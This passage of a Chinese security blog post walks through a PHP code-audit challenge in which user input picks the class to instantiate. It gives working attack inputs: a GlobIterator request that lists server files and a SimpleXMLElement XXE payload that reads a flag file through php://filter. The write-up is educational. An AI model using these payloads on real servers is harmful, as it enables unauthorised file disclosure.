<p>挺疑惑<code>SimpleXMLElement</code>第二个参数给2的原因..</p>
</blockquote>
<p>把结果输出出来了，这里得盲打xxe,这里挖个坑，以后再填。</p>
<p>下面来看一下红日安全提供的审计题：<br>index.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class NotFound&#123;</span><br><span class="line">    function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        die(&apos;404&apos;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">spl_autoload_register(</span><br><span class="line">    function ($class)&#123;</span><br><span class="line">        new NotFound();</span><br><span class="line">    &#125;</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line">$classname = isset($_GET[&apos;name&apos;]) ? $_GET[&apos;name&apos;] : null;</span><br><span class="line">$param = isset($_GET[&apos;param&apos;]) ? $_GET[&apos;param&apos;] : null;</span><br><span class="line">$param2 = isset($_GET[&apos;param2&apos;]) ? $_GET[&apos;param2&apos;] : null;</span><br><span class="line">if(class_exists($classname))&#123;</span><br><span class="line">    $newclass = new $classname($param,$param2);</span><br><span class="line">    var_dump($newclass);</span><br><span class="line">    foreach ($newclass as $key=&gt;$value)</span><br><span class="line">        echo $key.&apos;=&gt;&apos;.$value.&apos;&lt;br&gt;&apos;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里使用的是<code>spl_autoload_register()</code>函数，简而言之是<code>__autoload()</code>的升级版，给<code>autoload</code>创建一个队列，逐个执行。<br>参数如下：<br><img src="http://static.zybuluo.com/Passer6y/n4i8ulfhg49ayrsffvd4kr3k/image_1d3jolk9iniis60kn1gdjgtn9.png" alt="image_1d3jolk9iniis60kn1gdjgtn9.png-20.3kB"></p>
<p>解题思路：<br>先使用内置类:<code>GlobIterator</code>,其构造函数用法：<br><img src="http://static.zybuluo.com/Passer6y/gt1x37dmotxaccdlwv5idew4/image_1d3l7e9kgvqg6oi1tpg193v1so09.png" alt="image_1d3l7e9kgvqg6oi1tpg193v1so09.png-28kB"><br>这样就可以搜索文件位置：</p>
<p><img src="http://static.zybuluo.com/Passer6y/kwbctp2a5b8mb7e30f1zozr9/image_1d3l7r40cmru1ks91ejm1oqk1mb39.png" alt="image_1d3l7r40cmru1ks91ejm1oqk1mb39.png-101kB"></p>
<p>找flag位置：<br><code>name=GlobIterator&amp;param=*.php&amp;param2=0</code><br><img src="http://static.zybuluo.com/Passer6y/se3ple48jt88cqj1n0mjh4d7/image_1d3l7vpenrinps6fff4pd172v9.png" alt="image_1d3l7vpenrinps6fff4pd172v9.png-105.9kB"></p>
<p>这里读取flag要使用php文件流的原因是因为xxe读取的文件中如果存在<code>&lt;&gt;&#39;&quot;&amp;</code>就会导致xml文件解析错误，所以就只能这样通过流的方式base64编码读出。</p>
<p>读flag：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=SimpleXMLElement&amp;param2=2&amp;param=&lt;%3fxml+version%3d&quot;1.0&quot;%3f&gt;&lt;!DOCTYPE+ANY+[&lt;!ENTITY+xxe+SYSTEM+&quot;php%3a//filter/read%3dconvert.base64-encode/resource%3d/Users/passer6y/Documents/ctf/phpAuditLabs/day3_class_exists/f1agi3hEre.php&quot;&gt;]&gt;&lt;x&gt;%26xxe%3b&lt;/x&gt;</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/bp8ipalptkf3yl9bwlc77k4p/image_1d3l7lomu1ii11qrglu1qgne5cm.png" alt="image_1d3l7lomu1ii11qrglu1qgne5cm.png-112.4kB"></p>

      
    </div>

    

    
    
    

	
    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Passer6y</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://passer6y.fun/2019/02/14/PHP SECURITY CALENDAR 2017 Day1-3/" title="PHP SECURITY CALENDAR 2017 Day1-3">http://passer6y.fun/2019/02/14/PHP SECURITY CALENDAR 2017 Day1-3/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>true</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/10/The power of XSS WriteUp/" rel="next" title="The power of XSS WriteUp">
                <i class="fa fa-chevron-left"></i> The power of XSS WriteUp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/21.jpg"
                alt="Passer6y" />
            
              <p class="site-author-name" itemprop="name">Passer6y</p>
              <p class="site-description motion-element" itemprop="description">A salty fish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives">
                
                    <span class="site-state-item-count">17</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">5</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/passer6y" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:passer6y@d0g3.cn" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.wefun.win/" title="WeFun" target="_blank">WeFun</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Day-1-Wish-List"><span class="nav-number">1.</span> <span class="nav-text">Day 1 - Wish List</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Day-2-Twig"><span class="nav-number">2.</span> <span class="nav-text">Day 2 - Twig</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Day-3-Snow-Flake"><span class="nav-number">3.</span> <span class="nav-text">Day 3 - Snow Flake</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Passer6y</span>

  

  
</div>




<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

 



  <span class="post-meta-divider">|</span>



<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共41.7k字</span>
</div>
        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: false,
        appId: '3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz',
        appKey: 'TDRlM3HCI03SteHoOtVxJIMS',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.3.0"></script>



  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz", "TDRlM3HCI03SteHoOtVxJIMS");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            
            counter.save(null, {
              success: function(counter) {
                
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(counter.get('time'));
                
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            
              var $element = $(document.getElementById(url));
              $element.find('.leancloud-visitors-count').text('Counter not initialized! See more at console err msg.');
              console.error('ATTENTION! LeanCloud counter has security bug, see here how to solve it: https://github.com/theme-next/hexo-leancloud-counter-security. \n But you also can use LeanCloud without security, by set \'security\' option to \'false\'.');
            
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('Copied')
          else $(this).text('Copy failed')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('Copy')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
